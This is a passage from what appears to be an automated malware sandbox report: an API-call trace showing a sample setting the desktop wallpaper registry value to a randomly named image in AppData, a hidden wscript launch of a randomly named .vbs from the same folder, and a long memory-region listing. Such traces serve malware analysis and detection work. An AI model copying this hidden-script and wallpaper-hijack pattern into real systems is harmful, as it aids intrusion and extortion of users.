cchCount2=-1) returned 1 [0202.076] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/f", cchCount1=-1, lpString2="/t", cchCount2=-1) returned 1 [0202.076] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/f", cchCount1=-1, lpString2="-t", cchCount2=-1) returned 1 [0202.076] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/f", cchCount1=-1, lpString2="/s", cchCount2=-1) returned 1 [0202.076] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/f", cchCount1=-1, lpString2="-s", cchCount2=-1) returned 1 [0202.076] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/f", cchCount1=-1, lpString2="/d", cchCount2=-1) returned 3 [0202.076] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/f", cchCount1=-1, lpString2="-d", cchCount2=-1) returned 1 [0202.076] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/f", cchCount1=-1, lpString2="/f", cchCount2=-1) returned 2 [0202.076] RtlRestoreLastWin32Error () returned 0x0 [0202.076] RegCreateKeyExW (in: hKey=0x80000001, lpSubKey="Control Panel\\Desktop", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2001f, lpSecurityAttributes=0x0, phkResult=0x4cffa0c, lpdwDisposition=0x4cff9dc | out: phkResult=0x4cffa0c*=0xa8, lpdwDisposition=0x4cff9dc*=0x2) returned 0x0 [0202.077] RegQueryValueExW (in: hKey=0xa8, lpValueName="Wallpaper", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0 [0202.077] _memicmp (_Buf1=0x51078f0, _Buf2=0x901b04, _Size=0x7) returned 0 [0202.077] LoadStringW (in: hInstance=0x0, uID=0xca, lpBuffer=0x5109820, cchBufferMax=256 | out: lpBuffer="Value %s exists, overwrite(Yes/No)? ") returned 0x24 [0202.600] lstrlenW (lpString="Value %s exists, overwrite(Yes/No)? ") returned 36 [0202.600] _memicmp (_Buf1=0x51078f0, _Buf2=0x901b04, _Size=0x7) returned 0 [0202.600] LoadStringW (in: hInstance=0x0, uID=0xce, lpBuffer=0x5109820, cchBufferMax=256 | out: lpBuffer="YNA") returned 0x3 [0202.600] lstrlenW (lpString="YNA") returned 3 [0202.600] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\F7t5Hk0D.bmp") returned 50 [0202.600] RegSetValueExW (in: hKey=0xa8, lpValueName="Wallpaper", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\F7t5Hk0D.bmp", cbData=0x66 | out: lpData="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\F7t5Hk0D.bmp") returned 0x0 [0202.600] RegCloseKey (hKey=0xa8) returned 0x0 [0202.601] RtlRestoreLastWin32Error () returned 0x0 [0202.601] GetLastError () returned 0x0 [0202.601] FormatMessageW (in: dwFlags=0x1300, lpSource=0x0, dwMessageId=0x0, dwLanguageId=0x0, lpBuffer=0x4cff9b8, nSize=0x0, Arguments=0x0 | out: lpBuffer="\x9f30\x510\xfa88\x4cf\x2aa2\x90\x5c66\x90\xd70\x4f0") returned 0x27 [0203.212] GetLastError () returned 0x0 [0203.212] lstrlenW (lpString="The operation completed successfully.\r\n") returned 39 [0203.212] RtlRestoreLastWin32Error () returned 0x0 [0203.212] LocalFree (hMem=0x5109f30) returned 0x0 [0203.212] __iob_func () returned 0x77981208 [0203.212] _fileno (_File=0x77981228) returned 1 [0203.212] _errno () returned 0x4f005b0 [0203.212] _get_osfhandle (_FileHandle=1) returned 0x3c [0203.212] _errno () returned 0x4f005b0 [0203.212] GetFileType (hFile=0x3c) returned 0x2 [0203.212] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0203.212] GetFileType (hFile=0x3c) returned 0x2 [0203.212] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x4cff988 | out: lpMode=0x4cff988) returned 1 [0203.265] __iob_func () returned 0x77981208 [0203.265] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0203.265] lstrlenW (lpString="The operation completed successfully.\r\n") returned 39 [0203.265] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x5109f88*, nNumberOfCharsToWrite=0x27, lpNumberOfCharsWritten=0x4cff9ac, lpReserved=0x0 | out: lpBuffer=0x5109f88*, lpNumberOfCharsWritten=0x4cff9ac*=0x27) returned 1 [0203.279] exit (_Code=0) Thread: id = 120 os_tid = 0x2d0 Process: id = "12" image_name = "wscript.exe" filename = "c:\\windows\\syswow64\\wscript.exe" page_root = "0x5fcbb000" os_pid = "0xe2c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "8" os_parent_pid = "0xfa4" cmd_line = "wscript //B //Nologo \"C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\MuA3C6WI.vbs\"" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:00013c81" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1046 start_va = 0x20000 end_va = 0x47fff entry_point = 0x20000 region_type = mapped_file name = "wscript.exe" filename = "\\Windows\\SysWOW64\\wscript.exe" (normalized: "c:\\windows\\syswow64\\wscript.exe") Region: id = 1047 start_va = 0xcc0000 end_va = 0x4cbffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000cc0000" filename = "" Region: id = 1048 start_va = 0x4cc0000 end_va = 0x4cdffff entry_point = 0x0 region_type = private name = "private_0x0000000004cc0000" filename = "" Region: id = 1049 start_va = 0x4ce0000 end_va = 0x4ce1fff entry_point = 0x0 region_type = private name = "private_0x0000000004ce0000" filename = "" Region: id = 1050 start_va = 0x4cf0000 end_va = 0x4d03fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004cf0000" filename = "" Region: id = 1051 start_va = 0x4d10000 end_va = 0x4d4ffff entry_point = 0x0 region_type = private name = "private_0x0000000004d10000" filename = "" Region: id = 1052 start_va = 0x4d50000 end_va = 0x4e4ffff entry_point = 0x0 region_type = private name = "private_0x0000000004d50000" filename = "" Region: id = 1053 start_va = 0x4e50000 end_va = 0x4e53fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004e50000" filename = "" Region: id = 1054 start_va = 0x4e60000 end_va = 0x4e60fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004e60000" filename = "" Region: id = 1055 start_va = 0x4e70000 end_va = 0x4e71fff entry_point = 0x0 region_type = private name = "private_0x0000000004e70000" filename = "" Region: id = 1056 start_va = 0x77990000 end_va = 0x77b08fff entry_point = 0x77990000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 1057 start_va = 0x7f000000 end_va = 0x7f022fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f000000" filename = "" Region: id = 1058 start_va = 0x7f025000 end_va = 0x7f025fff entry_point = 0x0 region_type = private name = "private_0x000000007f025000" filename = "" Region: id = 1059 start_va = 0x7f02c000 end_va = 0x7f02efff entry_point = 0x0 region_type = private name = "private_0x000000007f02c000" filename = "" Region: id = 1060 start_va = 0x7f02f000 end_va = 0x7f02ffff entry_point = 0x0 region_type = private name = "private_0x000000007f02f000" filename = "" Region: id = 1061 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1062 start_va = 0x7fff0000 end_va = 0x7dfaf7a0ffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 1063 start_va = 0x7dfaf7a10000 end_va = 0x7ffaf7a0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfaf7a10000" filename = "" Region: id = 1064 start_va = 0x7ffaf7a10000 end_va = 0x7ffaf7bd1fff entry_point = 0x7ffaf7a10000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1065 start_va = 0x7ffaf7bd2000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffaf7bd2000" filename = "" Region: id = 1086 start_va = 0x4f90000 end_va = 0x4f9ffff entry_point = 0x0 region_type = private name = "private_0x0000000004f90000" filename = "" Region: id = 1087 start_va = 0x73040000 end_va = 0x7308efff entry_point = 0x73040000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 1088 start_va = 0x73090000 end_va = 0x73102fff entry_point = 0x73090000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 1089 start_va = 0x73030000 end_va = 0x73037fff entry_point = 0x73030000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 1090 start_va = 0x5130000 end_va = 0x522ffff entry_point = 0x0 region_type = private name = "private_0x0000000005130000" filename = "" Region: id = 1091 start_va = 0x74d30000 end_va = 0x74ea5fff entry_point = 0x74d30000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 1092 start_va = 0x75130000 end_va = 0x7521ffff entry_point = 0x75130000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 1114 start_va = 0x4cc0000 end_va = 0x4ccffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004cc0000" filename = "" Region: id = 1115 start_va = 0x4cd0000 end_va = 0x4cd3fff entry_point = 0x0 region_type = private name = "private_0x0000000004cd0000" filename = "" Region: id = 1116 start_va = 0x4e80000 end_va = 0x4f3dfff entry_point = 0x4e80000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1117 start_va = 0x4f40000 end_va = 0x4f7ffff entry_point = 0x0 region_type = private name = "private_0x0000000004f40000" filename = "" Region: id = 1118 start_va = 0x4fa0000 end_va = 0x509ffff entry_point = 0x0 region_type = private name = "private_0x0000000004fa0000" filename = "" Region: id = 1119 start_va = 0x745d0000 end_va = 0x745d7fff entry_point = 0x745d0000 region_type = mapped_file name = "version.dll" filename = "\\Windows\\SysWOW64\\version.dll" (normalized: "c:\\windows\\syswow64\\version.dll") Region: id = 1120 start_va = 0x74a30000 end_va = 0x74a88fff entry_point = 0x74a30000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 1121 start_va = 0x74a90000 end_va = 0x74a99fff entry_point = 0x74a90000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 1122 start_va = 0x74aa0000 end_va = 0x74abdfff entry_point = 0x74aa0000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 1123 start_va = 0x74ad0000 end_va = 0x74c0ffff entry_point = 0x74ad0000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 1124 start_va = 0x74c60000 end_va = 0x74cdafff entry_point = 0x74c60000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 1125 start_va = 0x74f70000 end_va = 0x75129fff entry_point = 0x74f70000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 1126 start_va = 0x76ce0000 end_va = 0x76d71fff entry_point = 0x76ce0000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 1127 start_va = 0x76f30000 end_va = 0x77019fff entry_point = 0x76f30000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 1128 start_va = 0x770b0000 end_va = 0x770f2fff entry_point = 0x770b0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 1129 start_va = 0x772c0000 end_va = 0x7736bfff entry_point = 0x772c0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 1130 start_va = 0x77370000 end_va = 0x774bcfff entry_point = 0x77370000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 1131 start_va = 0x778d0000 end_va = 0x7798dfff entry_point = 0x778d0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 1132 start_va = 0x7ef00000 end_va = 0x7effffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ef00000" filename = "" Region: id = 1133 start_va = 0x7f029000 end_va = 0x7f02bfff entry_point = 0x0 region_type = private name = "private_0x000000007f029000" filename = "" Region: id = 1134 start_va = 0x52c0000 end_va = 0x52cffff entry_point = 0x0 region_type = private name = "private_0x00000000052c0000" filename = "" Region: id = 1135 start_va = 0x52d0000 end_va = 0x5457fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000052d0000" filename = "" Region: id = 1136 start_va = 0x75220000 end_va = 0x7524afff entry_point = 0x75220000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 1137 start_va = 0x76da0000 end_va = 0x76ebffff entry_point = 0x76da0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 1141 start_va = 0x4ce0000 end_va = 0x4ce2fff entry_point = 0x4ce0000 region_type = mapped_file name = "wscript.exe.mui" filename = "\\Windows\\SysWOW64\\en-US\\wscript.exe.mui" (normalized: "c:\\windows\\syswow64\\en-us\\wscript.exe.mui") Region: id = 1142 start_va = 0x4f80000 end_va = 0x4f80fff entry_point = 0x0 region_type = private name = "private_0x0000000004f80000" filename = "" Region: id = 1143 start_va = 0x50a0000 end_va = 0x50a0fff entry_point = 0x0 region_type = private name = "private_0x00000000050a0000" filename = "" Region: id = 1144 start_va = 0x5460000 end_va = 0x55e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000005460000" filename = "" Region: id = 1145 start_va = 0x55f0000 end_va = 0x69effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000055f0000" filename = "" Region: id = 1146 start_va = 0x752b0000 end_va = 0x752bbfff entry_point = 0x752b0000 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 1147 start_va = 0x74910000 end_va = 0x74984fff entry_point = 0x74910000 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 1222 start_va = 0x50b0000 end_va = 0x50c0fff entry_point = 0x50b0000 region_type = mapped_file name = "wscript.exe" filename = "\\Windows\\SysWOW64\\wscript.exe" (normalized: "c:\\windows\\syswow64\\wscript.exe") Region: id = 1223 start_va = 0x50f0000 end_va = 0x50fffff entry_point = 0x0 region_type = private name = "private_0x00000000050f0000" filename = "" Region: id = 1224 start_va = 0x69f0000 end_va = 0x6d26fff entry_point = 0x69f0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 1225 start_va = 0x74550000 end_va = 0x745cffff entry_point = 0x74550000 region_type = mapped_file name = "sxs.dll" filename = "\\Windows\\SysWOW64\\sxs.dll" (normalized: "c:\\windows\\syswow64\\sxs.dll") Region: id = 1227 start_va = 0x50d0000 end_va = 0x50d3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000050d0000" filename = "" Region: id = 1228 start_va = 0x5230000 end_va = 0x526ffff entry_point = 0x0 region_type = private name = "private_0x0000000005230000" filename = "" Region: id = 1229 start_va = 0x6d30000 end_va = 0x6e2ffff entry_point = 0x0 region_type = private name = "private_0x0000000006d30000" filename = "" Region: id = 1230 start_va = 0x6e30000 end_va = 0x6ee7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006e30000" filename = "" Region: id = 1231 start_va = 0x748f0000 end_va = 0x7490cfff entry_point = 0x748f0000 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\SysWOW64\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll") Region: id = 1232 start_va = 0x7f026000 end_va = 0x7f028fff entry_point = 0x0 region_type = private name = "private_0x000000007f026000" filename = "" Region: id = 1273 start_va = 0x50e0000 end_va = 0x50e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000050e0000" filename = "" Region: id = 1274 start_va = 0x77670000 end_va = 0x776f1fff entry_point = 0x77670000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\SysWOW64\\clbcatq.dll" (normalized: "c:\\windows\\syswow64\\clbcatq.dll") Region: id = 1447 start_va = 0x5100000 end_va = 0x5100fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000005100000" filename = "" Region: id = 1448 start_va = 0x744c0000 end_va = 0x7453efff entry_point = 0x744c0000 region_type = mapped_file name = "vbscript.dll" filename = "\\Windows\\SysWOW64\\vbscript.dll" (normalized: "c:\\windows\\syswow64\\vbscript.dll") Region: id = 1517 start_va = 0x744b0000 end_va = 0x744bcfff entry_point = 0x744b0000 region_type = mapped_file name = "amsi.dll" filename = "\\Windows\\SysWOW64\\amsi.dll" (normalized: "c:\\windows\\syswow64\\amsi.dll") Region: id = 1526 start_va = 0x74460000 end_va = 0x74475fff entry_point = 0x74460000 region_type = mapped_file name = "mpoav.dll" filename = "\\Program Files (x86)\\Windows Defender\\MpOAV.dll" (normalized: "c:\\program files (x86)\\windows defender\\mpoav.dll") Region: id = 1527 start_va = 0x74450000 end_va = 0x7445cfff entry_point = 0x74450000 region_type = mapped_file name = "wldp.dll" filename = "\\Windows\\SysWOW64\\wldp.dll" (normalized: "c:\\windows\\syswow64\\wldp.dll") Region: id = 1528 start_va = 0x76680000 end_va = 0x767f4fff entry_point = 0x76680000 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\SysWOW64\\crypt32.dll" (normalized: "c:\\windows\\syswow64\\crypt32.dll") Region: id = 1529 start_va = 0x77060000 end_va = 0x770a1fff entry_point = 0x77060000 region_type = mapped_file name = "wintrust.dll" filename = "\\Windows\\SysWOW64\\wintrust.dll" (normalized: "c:\\windows\\syswow64\\wintrust.dll") Region: id = 1530 start_va = 0x771c0000 end_va = 0x771cdfff entry_point = 0x771c0000 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\SysWOW64\\msasn1.dll" (normalized: "c:\\windows\\syswow64\\msasn1.dll") Region: id = 1531 start_va = 0x74620000 end_va = 0x74632fff entry_point = 0x74620000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\SysWOW64\\cryptsp.dll" (normalized: "c:\\windows\\syswow64\\cryptsp.dll") Region: id = 1532 start_va = 0x74880000 end_va = 0x7489afff entry_point = 0x74880000 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\SysWOW64\\bcrypt.dll" (normalized: "c:\\windows\\syswow64\\bcrypt.dll") Region: id = 1533 start_va = 0x745f0000 end_va = 0x7461efff entry_point = 0x745f0000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 1534 start_va = 0x5110000 end_va = 0x5110fff entry_point = 0x5110000 region_type = mapped_file name = "mua3c6wi.vbs" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\MuA3C6WI.vbs" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mua3c6wi.vbs") Region: id = 1535 start_va = 0x5270000 end_va = 0x52affff entry_point = 0x0 region_type = private name = "private_0x0000000005270000" filename = "" Region: id = 1536 start_va = 0x6ef0000 end_va = 0x6feffff entry_point = 0x0 region_type = private name = "private_0x0000000006ef0000" filename = "" Region: id = 1537 start_va = 0x74440000 end_va = 0x74449fff entry_point = 0x74440000 region_type = mapped_file name = "msisip.dll" filename = "\\Windows\\SysWOW64\\msisip.dll" (normalized: "c:\\windows\\syswow64\\msisip.dll") Region: id = 1538 start_va = 0x7eefd000 end_va = 0x7eefffff entry_point = 0x0 region_type = private name = "private_0x000000007eefd000" filename = "" Region: id = 1539 start_va = 0x77700000 end_va = 0x77757fff entry_point = 0x77700000 region_type = mapped_file name = "coml2.dll" filename = "\\Windows\\SysWOW64\\coml2.dll" (normalized: "c:\\windows\\syswow64\\coml2.dll") Region: id = 1745 start_va = 0x6ff0000 end_va = 0x702ffff entry_point = 0x0 region_type = private name = "private_0x0000000006ff0000" filename = "" Region: id = 1746 start_va = 0x7030000 end_va = 0x712ffff entry_point = 0x0 region_type = private name = "private_0x0000000007030000" filename = "" Region: id = 1747 start_va = 0x74380000 end_va = 0x74411fff entry_point = 0x74380000 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10240.16384_none_49c02355cf03478c\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10240.16384_none_49c02355cf03478c\\comctl32.dll") Region: id = 1748 start_va = 0x74420000 end_va = 0x74436fff entry_point = 0x74420000 region_type = mapped_file name = "wshext.dll" filename = "\\Windows\\SysWOW64\\wshext.dll" (normalized: "c:\\windows\\syswow64\\wshext.dll") Region: id = 1749 start_va = 0x74c10000 end_va = 0x74c53fff entry_point = 0x74c10000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 1750 start_va = 0x74ce0000 end_va = 0x74d23fff entry_point = 0x74ce0000 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\SysWOW64\\powrprof.dll" (normalized: "c:\\windows\\syswow64\\powrprof.dll") Region: id = 1751 start_va = 0x752c0000 end_va = 0x7667efff entry_point = 0x752c0000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 1752 start_va = 0x76800000 end_va = 0x76cdcfff entry_point = 0x76800000 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\SysWOW64\\windows.storage.dll" (normalized: "c:\\windows\\syswow64\\windows.storage.dll") Region: id = 1753 start_va = 0x77100000 end_va = 0x7710efff entry_point = 0x77100000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 1754 start_va = 0x771d0000 end_va = 0x7725cfff entry_point = 0x771d0000 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\SysWOW64\\SHCore.dll" (normalized: "c:\\windows\\syswow64\\shcore.dll") Region: id = 1755 start_va = 0x7eefa000 end_va = 0x7eefcfff entry_point = 0x0 region_type = private name = "private_0x000000007eefa000" filename = "" Region: id = 1869 start_va = 0x5120000 end_va = 0x5123fff entry_point = 0x0 region_type = private name = "private_0x0000000005120000" filename = "" Region: id = 1870 start_va = 0x52b0000 end_va = 0x52b3fff entry_point = 0x0 region_type = private name = "private_0x00000000052b0000" filename = "" Region: id = 1871 start_va = 0x7170000 end_va = 0x717ffff entry_point = 0x0 region_type = private name = "private_0x0000000007170000" filename = "" Region: id = 1872 start_va = 0x74340000 end_va = 0x74374fff entry_point = 0x74340000 region_type = mapped_file name = "scrobj.dll" filename = "\\Windows\\SysWOW64\\scrobj.dll" (normalized: "c:\\windows\\syswow64\\scrobj.dll") Region: id = 2017 start_va = 0x5110000 end_va = 0x511ffff entry_point = 0x0 region_type = private name = "private_0x0000000005110000" filename = "" Region: id = 6089 start_va = 0x7130000 end_va = 0x716ffff entry_point = 0x0 region_type = private name = "private_0x0000000007130000" filename = "" Region: id = 6090 start_va = 0x7180000 end_va = 0x727ffff entry_point = 0x0 region_type = private name = "private_0x0000000007180000" filename = "" Region: id = 6091 start_va = 0x74480000 end_va = 0x744a2fff entry_point = 0x74480000 region_type = mapped_file name = "wshom.ocx" filename = "\\Windows\\SysWOW64\\wshom.ocx" (normalized: "c:\\windows\\syswow64\\wshom.ocx") Region: id = 6092 start_va = 0x7eef7000 end_va = 0x7eef9fff entry_point = 0x0 region_type = private name = "private_0x000000007eef7000" filename = "" Region: id = 6325 start_va = 0x7280000 end_va = 0x72bffff entry_point = 0x0 region_type = private name = "private_0x0000000007280000" filename = "" Region: id = 6326 start_va = 0x72c0000 end_va = 0x73bffff entry_point = 0x0 region_type = private name = "private_0x00000000072c0000" filename = "" Region: id = 6327 start_va = 0x74320000 end_va = 0x74336fff entry_point = 0x74320000 region_type = mapped_file name = "mpr.dll" filename = "\\Windows\\SysWOW64\\mpr.dll" (normalized: "c:\\windows\\syswow64\\mpr.dll") Region: id = 6328 start_va = 0x7eef4000 end_va = 0x7eef6fff entry_point = 0x0 region_type = private name = "private_0x000000007eef4000" filename = "" Region: id = 6462 start_va = 0x74710000 end_va = 0x7473afff entry_point = 0x74710000 region_type = mapped_file name = "scrrun.dll" filename = "\\Windows\\SysWOW64\\scrrun.dll" (normalized: "c:\\windows\\syswow64\\scrrun.dll") Region: id = 7010 start_va = 0x73c0000 end_va = 0x73fffff entry_point = 0x0 region_type = private name = "private_0x00000000073c0000" filename = "" Region: id = 7011 start_va = 0x7400000 end_va = 0x74fffff entry_point = 0x0 region_type = private name = "private_0x0000000007400000" filename = "" Region: id = 7012 start_va = 0x7eef1000 end_va = 0x7eef3fff entry_point = 0x0 region_type = private name = "private_0x000000007eef1000" filename = "" Region: id = 7013 start_va = 0x7500000 end_va = 0x750cfff entry_point = 0x7500000 region_type = mapped_file name = "wshom.ocx" filename = "\\Windows\\SysWOW64\\wshom.ocx" (normalized: "c:\\windows\\syswow64\\wshom.ocx") Region: id = 7014 start_va = 0x7510000 end_va = 0x7510fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000007510000" filename = "" Region: id = 7020 start_va = 0x7520000 end_va = 0x755ffff entry_point = 0x0 region_type = private name = "private_0x0000000007520000" filename = "" Region: id = 7021 start_va = 0x7560000 end_va = 0x765ffff entry_point = 0x0 region_type = private name = "private_0x0000000007560000" filename = "" Region: id = 7022 start_va = 0x741d0000 end_va = 0x74311fff entry_point = 0x741d0000 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\SysWOW64\\propsys.dll" (normalized: "c:\\windows\\syswow64\\propsys.dll") Region: id = 7023 start_va = 0x7eeee000 end_va = 0x7eef0fff entry_point = 0x0 region_type = private name = "private_0x000000007eeee000" filename = "" Region: id = 7149 start_va = 0x6ff0000 end_va = 0x702ffff entry_point = 0x0 region_type = private name = "private_0x0000000006ff0000" filename = "" Region: id = 7150 start_va = 0x7030000 end_va = 0x712ffff entry_point = 0x0 region_type = private name = "private_0x0000000007030000" filename = "" Region: id = 7151 start_va = 0x7eefa000 end_va = 0x7eefcfff entry_point = 0x0 region_type = private name = "private_0x000000007eefa000" filename = "" Region: id = 7152 start_va = 0x73fc0000 end_va = 0x741c6fff entry_point = 0x73fc0000 region_type = mapped_file name = "actxprxy.dll" filename = "\\Windows\\SysWOW64\\actxprxy.dll" (normalized: "c:\\windows\\syswow64\\actxprxy.dll") Region: id = 7647 start_va = 0x77020000 end_va = 0x77055fff entry_point = 0x77020000 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\SysWOW64\\cfgmgr32.dll" (normalized: "c:\\windows\\syswow64\\cfgmgr32.dll") Region: id = 7656 start_va = 0x7170000 end_va = 0x7173fff entry_point = 0x7170000 region_type = 